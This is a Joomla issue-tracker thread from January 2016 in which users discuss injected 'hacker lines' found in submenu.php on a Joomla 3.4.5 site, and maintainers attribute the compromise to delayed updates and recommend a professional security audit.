I'm sorry to say this: You're site has been hacked. You updated too late.

These are typical hacker lines and not present in original submenu.php.

Interesting...I was wondering why there was such a difference in the files between the demo site and other sites.

I just feel stupid now! Was trying to help a guy on the forums and thought I'd found something that got missed.

Sorry all.

I had the same problem (although on line 91 instead of 81). The same code was in the same file, but I'm dumb-struck as to how the hack occurred. I have the strongest passwords (caps, non-caps, numbers & symbols), I own & maintain my own servers, there are very few external Joomla! users and none at any sort of Super User level, plus I have no FTP accounts on the affected webspace whatsoever. MySQL DB passwords were automatically generated by the server and consist of 12 characters of random alpha/numeric/symbol construction, and held only in Joomla!'s configuration.php file. I NEVER allow my browser to save passwords and never share them with others.

My question is, how on earth did my site get hacked (as above) with the security I have implemented??? I figure it has to be one of the following...
1. A "Super-User" account in Joomla! got hacked
2. The "Root" password on the server in question got hacked
3. Joomla!'s own code was abused to re-write its core PHP files
4. Something else?

Joomla! version: 3.4.5
PHP version: 5.4.36
Platform: Linux (CentOS)

Any & all help gratefully appreciated as I really don't want this to happen again.

Thanks all! ;)

Really simple answer. You're not updating joomla.
On 3 Jan 2016 10:59 pm, "WillSmithPhoto" notifications@github.com wrote:

I had the same problem (although on line 91 instead of 81). The same code
was in the same file, but I'm dumb-struck as to how the hack occurred. I
have the strongest passwords (caps, non-caps, numbers & symbols), I own &
maintain my own servers, there are very few external Joomla! users and none
at any sort of Super User level, plus I have no FTP accounts on the
affected webspace whatsoever. MySQL DB passwords were automatically
generated by the server and consist of 12 characters of random
alpha/numeric/symbol construction, and held only in Joomla!'s
configuration.php file. I NEVER allow my browser to save passwords and
never share them with others.

My question is, how on earth did my site get hacked (as above) with the
security I have implemented??? I figure it has to be one of the following...
1. A "Super-User" account in Joomla! got hacked
2. The "Root" password on the server in question got hacked
3. Joomla!'s own code was abused to re-write its core PHP files
4. Something else?

Joomla! version: 3.4.5
PHP version: 5.4.36
Platform: Linux (CentOS)

Any & all help gratefully appreciated as I really don't want this to
happen again.

Thanks all! ;)

This comment was created with the J!Tracker Application
https://github.com/joomla/jissues at issues.joomla.org/joomla-cms/8741
https://issues.joomla.org/tracker/joomla-cms/8741.

—
Reply to this email directly or view it on GitHub
#8741 (comment).

Thanks for the response. I update my Joomla! installs as often as possible but this has lapsed a bit over the December/Christmas/New Year period. Are you saying that the reason my site got hacked was a security hole in the code of Joomla! v3.4.5? I just want confirmation on the cause of this problem so I can take steps to avoid it ever happening again.

In my experience, the "really simple answer" is often not the right answer.

Many thanks!

A bit longer time span than that but yes most likely
On 3 Jan 2016 11:26 pm, "WillSmithPhoto" notifications@github.com wrote:

Thanks for the response. I update my Joomla! installs as often as possible
but this has lapsed a bit over the December/Christmas/New Year period. Are
you saying that the reason my site got hacked was a security hole in the
code of Joomla! v3.4.5? I just want confirmation on the cause of this
problem so I can take steps to avoid it ever happening again.

In my experience, the "really simple answer" is often not the right answer.

Many thanks!

This comment was created with the J!Tracker Application
https://github.com/joomla/jissues at issues.joomla.org/joomla-cms/8741
https://issues.joomla.org/tracker/joomla-cms/8741.

—
Reply to this email directly or view it on GitHub
#8741 (comment).

Thanks for your input "brianteeman", but I'm looking for an answer as to what actually allowed this specific hack, rather than a likelihood based on assumptions. I've made a bunch of assumptions myself and secured all the obvious gateways, but I'm looking to secure my all of my sites (1 of which seems to have been hacked in the ways described above, the other 24 seem unaffected at the moment). Should I change passwords, encryption keys, server root credentials, or is Joomla! itself at fault? Facts would be appreciated over conjecture.

Anything concrete is appreciated?

Many thanks!

You're not going to get specific answers like that on this forum. A proper
security audit with accredited professionals may help with the level of
detail you are looking for, but without giving someone access to your
server to review access logs and changes made as a result of a hack you're
going to get assumed answers.

On Sunday, January 3, 2016, WillSmithPhoto notifications@github.com wrote:

Thanks for your input "brianteeman", but I'm looking for an answer as to
what actually allowed this specific hack, rather than a likelihood based on
assumptions. I've made a bunch of assumptions myself and secured all the
obvious gateways, but I'm looking to secure my all of my sites (1 of which
seems to have been hacked in the ways described above, the other 24 seem
unaffected at the moment). Should I change passwords, encryption keys,
server root credentials, or is Joomla! itself at fault? Facts would be
appreciated over conjecture.

Anything concrete is appreciated?

Many thanks!

This comment was created with the J!Tracker Application
https://github.com/joomla/jissues at issues.joomla.org/joomla-cms/8741
https://issues.joomla.org/tracker/joomla-cms/8741.

—
Reply to this email directly or view it on GitHub
#8741 (comment).

Thanks 'mbabker'. I agree, and I'm not looking for someone to tell me exactly what's gone wrong based on the information I have provided. I'm just surprised that this site got hacked when my personal security is pretty tight so I'm looking for someone who can confirm that either Joomla! v 3.4.5 is universally vulnerable to this kind of hack (and some info on how this hack is performed/defended against) or whether this is a Linux/CentOS/Other based attack, or if there's something else I haven't yet considered. How have other people been vulnerable to these attacks? What was their fixes? This is the kind of thing I'm after.

As mentioned previously, I have checked my server-error-logs and the errors are identical to the original poster's errors. My affected site is standard Joomla! v3.4.5 with no custom code changes made. My security is as good as I ever thought would be needed, but it was this forum thread that made me believe my site was hacked. I just want to narrow down the cause of this hack as I have 30 years experience in this sector and I genuinely don't get why my site has suffered this failure.

Any & all input appreciated. Thanks all!

You already have the only answer that can be given without access to your
server.
On 4 Jan 2016 12:36 am, "WillSmithPhoto" notifications@github.com wrote:

Thanks 'mbabker'. I agree, and I'm not looking for someone to tell me
exactly what's gone wrong based on the information I have provided. I'm
just surprised that this site got hacked when my personal security is
pretty tight so I'm looking for someone who can confirm that either Joomla!
v 3.4.5 is universally vulnerable to this kind of hack (and some info on
how this hack is performed/defended against) or whether this is a
Linux/CentOS/Other based attack, or if there's something else I haven't yet
considered. How have other people been vulnerable to these attacks? What
was their fixes? This is the kind of thing I'm after.

As mentioned previously, I have checked my server-error-logs and the
errors are identical to the original poster's errors. My affected site is
standard Joomla! v3.4.5 with no custom code changes made. My security is as
good as I ever thought would be needed, but it was this forum thread that
made me believe my site was hacked. I just want to narrow down the cause of
this hack as I have 30 years experience in this sector and I genuinely
don't get why my site has suffered this failure.

Any & all input appreciated. Thanks all!

This comment was created with the J!Tracker Application
https://github.com/joomla/jissues at issues.joomla.org/joomla-cms/8741
https://issues.joomla.org/tracker/joomla-cms/8741.

—
Reply to this email directly or view it on GitHub
#8741 (comment).

I understand, thanks for your help. I was hoping that this particular hack was a well known one with a predictable entry point.

Many thanks!